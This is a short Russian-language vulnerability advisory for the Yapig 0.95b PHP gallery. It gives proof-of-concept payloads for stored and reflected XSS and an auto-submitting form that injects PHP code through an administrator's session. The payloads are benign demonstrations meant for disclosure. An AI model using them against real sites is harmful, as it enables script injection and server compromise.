Программа: Yapig 0.95b и более ранние версии 

Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей, а также выполнить произвольный PHP сценарий на системе.

1. Уязвимость существует из-за недостаточной обработки входных данных в поле Website формы Homepage. 

Пример: 

"><script>alert('hi')</script> 

2. Уязвимость существует при обработке параметра img_size в сценарии view.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Для успешной эксплуатации уязвимости должна быть включена опция register_globals.

Пример: 

http://your-server/path-to-yapig/view.php?gid=1& phid=1&img_size=><script>alert('hi')</script> 

3. Удаленный пользователь может c помощью специально сформированной формы внедрить и выполнить произвольный PHP сценарий на целевой системе. Для удачной эксплуатации уязвимости требуется участие пользователя с административными привилегиями в приложении. 

Пример:

<form method="post" action="http://your-server/path-to-yapig/ yapig095b/modify_gallery.php?action=
mod_info&amp;gid=1">
<input value='TestGallery"; echo "evil' name="title" type="text">
<input value="TestAuthor" name="author" type="text">
<input value="TestDate" name="date" type="text"> 
<input value="" name="dir" type="text">
<input value="TestDescription" name="desc" type="text">
<input type="submit">
</form> 

<script type="text/javascript">
document.forms[0].submit();
</script>

Оставить мнение